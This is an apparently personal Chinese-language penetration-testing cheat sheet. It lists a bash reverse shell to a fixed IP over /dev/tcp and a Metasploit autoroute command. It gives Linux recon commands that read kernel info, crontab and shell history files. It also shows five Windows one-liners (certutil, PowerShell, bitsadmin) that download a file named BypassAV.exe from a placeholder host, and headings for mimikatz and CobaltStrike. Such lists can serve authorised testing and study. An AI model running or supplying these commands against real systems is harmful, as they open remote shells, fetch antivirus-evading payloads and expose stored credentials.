Metasploit
生成木马
meterpreter
配置静态路由
run autoroute -s 10.xx.xx.xx/24
Linux
反弹shell
bash:
bash -i >& /dev/tcp/192.168.65.128**/**6767 0>&1
更多:
信息收集
是否在docker中
/proc/1/cgroup
系统版本
cat /etc/issue
内核版本
cat /proc/version
环境变量
cat /etc/profile
开机自启
cat /etc/crontab
命令记录
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
Windows
信息收集
下载文件
certutil.exe -urlcache -split -f “http://ip:port/BypassAV.exe" bad.txt
powershell Invoke-WebRequest -Uri http://ip:port/BypassAV.exe -OutFile a.exe
powershell Start-BitsTransfer -Source http://ip:port/BypassAV.exe -Destination a.txt
powershell (new-object System.Net.WebClient).DownloadFile(‘ip:port/BypassAV.exe’, ‘a.exe’)
bitsadmin /transfer myDownLoadJob /download /priority normal “ip:port/BypassAV.exe”
mimikataz
CobaltStrike
SQL注入
手工注入
SQLmap
Codeql
docker
链接
https://0range-x.github.io/2022/01/26/Domain-penetration_one-stop/